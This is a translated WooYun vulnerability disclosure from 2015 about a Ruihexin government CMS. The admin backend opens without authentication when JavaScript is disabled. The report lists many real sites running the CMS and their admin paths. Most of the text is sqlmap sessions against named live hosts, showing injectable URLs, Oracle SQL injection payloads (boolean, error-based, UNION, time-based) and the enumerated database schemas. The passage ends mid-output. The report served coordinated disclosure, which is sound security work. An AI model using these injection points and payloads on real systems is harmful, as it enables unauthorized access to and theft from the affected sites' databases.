Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0115835

Title: Ruihexin (瑞合信) government CMS: unauthorized access leading to SQL injection (bundle) #2

Affected vendor: Ruihexin Network Technology (瑞合信网络科技)

Author: Hero

Submitted: 2015-05-25 23:26

Fixed: 2015-08-28 00:56

Published: 2015-08-28 00:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-25: Details sent to the vendor; awaiting vendor response
2015-05-30: Vendor confirmed; details disclosed to the vendor only
2015-06-02: Details opened to third-party security partners
2015-07-24: Details disclosed to core white hats and relevant domain experts
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public

Brief description:

SQL injection and related issues

Detailed description:

Earlier report: WooYun: Ruihexin government CMS SA-privilege injection (bundle)
Official site: http://www.rhxwl.com/Server.asp
Cases:
http://www.linhaihome.com/
http://jh.zjmy.net/
http://www.lqmyjj.com/
http://www.sxjhjj.com/
http://www.sxkfqjj.com/
http://www.sxpjgtmyjj.com/
http://www.wlmyjj.com/
http://www.hyqmyjj.com/
http://www.jjmyjj.com/
http://www.yhmyjj.com/
http://www.ttmyjj.com/
http://www.xjmyjj.com/
http://www.lqmyjj.com

Process: once JavaScript is disabled in the browser, the admin backend can be reached without authorization and operated freely (the access check is evidently enforced only by client-side script).

[Screenshot: 1.jpg]


admin_manage/cp/Manage_cp.asp
admin_manage/xhzl/Manage.asp
admin_manage/zczc/Manage.asp
admin_manage/ybry/Manage.asp
admin_manage/xsqy/Manage.asp
admin_manage/system/Manage.asp
admin_manage/tbtj11/manage.asp
...
The detailed walkthrough uses this site as the example: http://jh.zjmy.net/
Proof of unauthorized access:

[Screenshot: 2.jpg]


[Screenshot: 3.jpg]


SQL injection:
#1
http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?
lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:13:44
[07:13:44] [INFO] resuming back-end DBMS 'oracle'
[07:13:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 5686=5686
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 9249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(114)||CHR(118)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (9249=9249) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-4202 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(114)||CH
R(118)||CHR(99)||CHR(58)||CHR(98)||CHR(88)||CHR(74)||CHR(110)||CHR(102)||CHR(111
)||CHR(78)||CHR(118)||CHR(115)||CHR(71)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||
CHR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 4485=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(86)|
|CHR(90)||CHR(117),5)
---
[07:13:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:13:44] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:13:44] [INFO] fetching database (schema) names
[07:13:44] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:13:45] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:13:45] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:13:45


[Screenshot: #1.jpg]


#2
http://jh.zjmy.net/admin_manage/xhzl/mg_edithy.asp?id=3278&page=1&title=1&lx=%D0%AD%BB%E1%BC%F2%B1%A8

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xhzl/mg_edithy.asp?id
=3278&page=1&title=1&lx=%D0%AD%BB%E1%BC%F2%B1%A8" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:15:16
[07:15:16] [INFO] resuming back-end DBMS 'oracle'
[07:15:16] [INFO] testing connection to the target url
[07:15:16] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3278 AND 9710=9710&page=1&title=1&lx=????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=3278 AND 5303=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||
CHR(99)||CHR(113)||CHR(58)||(SELECT (CASE WHEN (5303=5303) THEN 1 ELSE 0 END) FR
OM DUAL)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)&p
age=1&title=1&lx=????
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=-4200 UNION ALL SELECT NULL, CHR(58)||CHR(118)||CHR(99)||CHR(113
)||CHR(58)||CHR(110)||CHR(109)||CHR(115)||CHR(65)||CHR(70)||CHR(115)||CHR(101)||
CHR(119)||CHR(120)||CHR(99)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58), NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=1&lx
=????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=3278 AND 5184=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(106)||CHR(
101)||CHR(65),5)&page=1&title=1&lx=????
---
[07:15:16] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:15:16] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:15:16] [INFO] fetching database (schema) names
[07:15:17] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:15:17] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'


[Screenshot: #2.jpg]


#3
http://jh.zjmy.net/admin_manage/cp/gq_edit.asp?id=35111&cz=&page=1

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/cp/gq_edit.asp?id=351
11&cz=&page=1" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:16:45
[07:16:45] [INFO] resuming back-end DBMS 'oracle'
[07:16:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35111' AND 6782=6782 AND 'AORJ'='AORJ&cz=&page=1
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=35111' AND 7435=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)|
|CHR(113)||CHR(100)||CHR(58)||(SELECT (CASE WHEN (7435=7435) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
AND 'sPGU'='sPGU&cz=&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 50 columns
Payload: id=-8412' UNION ALL SELECT NULL, NULL, CHR(58)||CHR(97)||CHR(113)||
CHR(100)||CHR(58)||CHR(117)||CHR(119)||CHR(119)||CHR(88)||CHR(110)||CHR(89)||CHR
(103)||CHR(106)||CHR(115)||CHR(113)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(
58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &cz=&page=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=35111' AND 2969=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(77)||CHR
(82)||CHR(105),5) AND 'SzOc'='SzOc&cz=&page=1
---
[07:16:45] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:16:45] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:16:45] [INFO] fetching database (schema) names
[07:16:45] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:16:46] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:16:46] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:16:46


[Screenshot: #3.jpg]


#4
http://jh.zjmy.net/admin_manage/zczc/mg_edithy.asp?id=45910&page=1&title=1&lx=--&mc=

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_edithy.asp?id
=45910&page=1&title=1&lx=--&mc=" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:19:07
[07:19:07] [INFO] resuming back-end DBMS 'oracle'
[07:19:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=45910 AND 1182=1182&page=1&title=1&lx=--&mc=
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=45910 AND 1583=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)|
|CHR(108)||CHR(112)||CHR(58)||(SELECT (CASE WHEN (1583=1583) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(105)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)
&page=1&title=1&lx=--&mc=
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-4007 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, CHR(58)||CHR(116)||CHR(108)||CHR(112)||CHR(58)||CHR(100)||CHR(103)|
|CHR(89)||CHR(73)||CHR(65)||CHR(120)||CHR(113)||CHR(83)||CHR(70)||CHR(78)||CHR(5
8)||CHR(105)||CHR(121)||CHR(114)||CHR(58), NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=--&mc=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=45910 AND 4688=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(102)||CHR(
86)||CHR(115),5)&page=1&title=1&lx=--&mc=
---
[07:19:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:19:07] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:19:07] [INFO] fetching database (schema) names
[07:19:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:19:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:19:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:19:07


[Screenshot: #4.jpg]


#5
http://jh.zjmy.net/admin_manage/zczc/mg_editwz.asp?id=475&page=1&title=&mc=%D3%D1%C7%E9%C1%B4%BD%D3&ljlx=

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_editwz.asp?id
=475&page=1&title=&mc=%D3%D1%C7%E9%C1%B4%BD%D3&ljlx=" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:20:47
[07:20:48] [INFO] resuming back-end DBMS 'oracle'
[07:20:48] [INFO] testing connection to the target url
[07:20:48] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=475 AND 6601=6601&page=1&title=&mc=????????&ljlx=
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=475 AND 9996=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||C
HR(114)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (9996=9996) THEN 1 ELSE 0 END) FRO
M DUAL)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL)&pa
ge=1&title=&mc=????????&ljlx=
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-1476 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(109)||CHR(114)||
CHR(97)||CHR(58)||CHR(86)||CHR(79)||CHR(65)||CHR(106)||CHR(102)||CHR(114)||CHR(1
16)||CHR(118)||CHR(111)||CHR(101)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58
), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=&mc=??????
??&ljlx=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=475 AND 2336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(119)||CHR(1
08)||CHR(80),5)&page=1&title=&mc=????????&ljlx=
---
[07:20:48] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:20:48] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:20:48] [INFO] fetching database (schema) names
[07:20:48] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:20:48] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'
[*] shutting down at 07:20:48


[Screenshot: #5.jpg]


#6
http://jh.zjmy.net/admin_manage/ybry/mg_edithy.asp?id=22325&page=1&title=1&lx=0050002&mc=%B9%A4%D7%F7%D1%A7%CF%B0

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/ybry/mg_edithy.asp?id
=22325&page=1&title=1&lx=0050002&mc=%B9%A4%D7%F7%D1%A7%CF%B0" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:22:02
[07:22:02] [INFO] resuming back-end DBMS 'oracle'
[07:22:02] [INFO] testing connection to the target url
[07:22:02] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=22325 AND 7867=7867&page=1&title=1&lx=0050002&mc=??????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=22325 AND 1661=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(101)|
|CHR(122)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (1661=1661) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=0050002&mc=??????
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-7148 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CHR(58)||CHR(101)||CHR(122)||CHR(99)||CHR(58)||CHR(118)||CHR(103)||CHR(80)||CHR
(122)||CHR(69)||CHR(120)||CHR(102)||CHR(79)||CHR(86)||CHR(83)||CHR(58)||CHR(113)
||CHR(106)||CHR(112)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=0050002&mc=??????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=22325 AND 8726=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(109)||CHR(
114)||CHR(68),5)&page=1&title=1&lx=0050002&mc=??????
---
[07:22:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:22:02] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:22:02] [INFO] fetching database (schema) names
[07:22:02] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:22:03] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:22:03


[Screenshot: #6.jpg]


#7
http://jh.zjmy.net/admin_manage/xsqy/mg_edithy.asp?id=1907&page=1&title=1&lx=%BB%E1%D4%B1%B7%E7%B2%C9

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xsqy/mg_edithy.asp?id
=1907&page=1&title=1&lx=%BB%E1%D4%B1%B7%E7%B2%C9" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:23:17
[07:23:17] [INFO] resuming back-end DBMS 'oracle'
[07:23:17] [INFO] testing connection to the target url
[07:23:17] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
[07:23:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1907 AND 7746=7746&page=1&title=1&lx=??????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=1907 AND 5282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||
CHR(101)||CHR(110)||CHR(58)||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(105)||CHR(113)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=??????
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-5272 UNION ALL SELECT NULL, NULL, NULL, CHR(58)||CHR(108)||CHR(
101)||CHR(110)||CHR(58)||CHR(109)||CHR(85)||CHR(105)||CHR(118)||CHR(89)||CHR(83)
||CHR(100)||CHR(115)||CHR(113)||CHR(116)||CHR(58)||CHR(105)||CHR(113)||CHR(117)|
|CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&tit
le=1&lx=??????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=1907 AND 1792=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(89)||CHR(99
)||CHR(107),5)&page=1&title=1&lx=??????
---
[07:23:17] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:23:17] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:23:17] [INFO] fetching database (schema) names
[07:23:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:23:18] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[07:23:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:23:18


[Screenshot: #7.jpg]


Proofs from other cases:
http://www.linhaihome.com/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.linhaihome.com/admin_manage/system/mg_edit
wz.asp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:27:06
[07:27:06] [INFO] resuming back-end DBMS 'oracle'
[07:27:06] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 6573=6573
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 3125=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(120)||CHR(106)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3125=3125) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-5471 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(120)||CH
R(106)||CHR(98)||CHR(58)||CHR(74)||CHR(84)||CHR(118)||CHR(97)||CHR(72)||CHR(78)|
|CHR(90)||CHR(106)||CHR(81)||CHR(87)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR
(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 7336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(105)
||CHR(99)||CHR(76),5)
---
[07:27:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:27:07] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:27:07] [INFO] fetching database (schema) names
[07:27:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:27:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:27:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.linhaihome.com'
[*] shutting down at 07:27:07


http://www.lqmyjj.com//admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.lqmyjj.com//admin_manage/system/mg_editwz.
asp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:29:17
[07:29:18] [INFO] resuming back-end DBMS 'oracle'
[07:29:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 8083=8083
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 2858=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(111)||CHR(114)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2858=2858) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
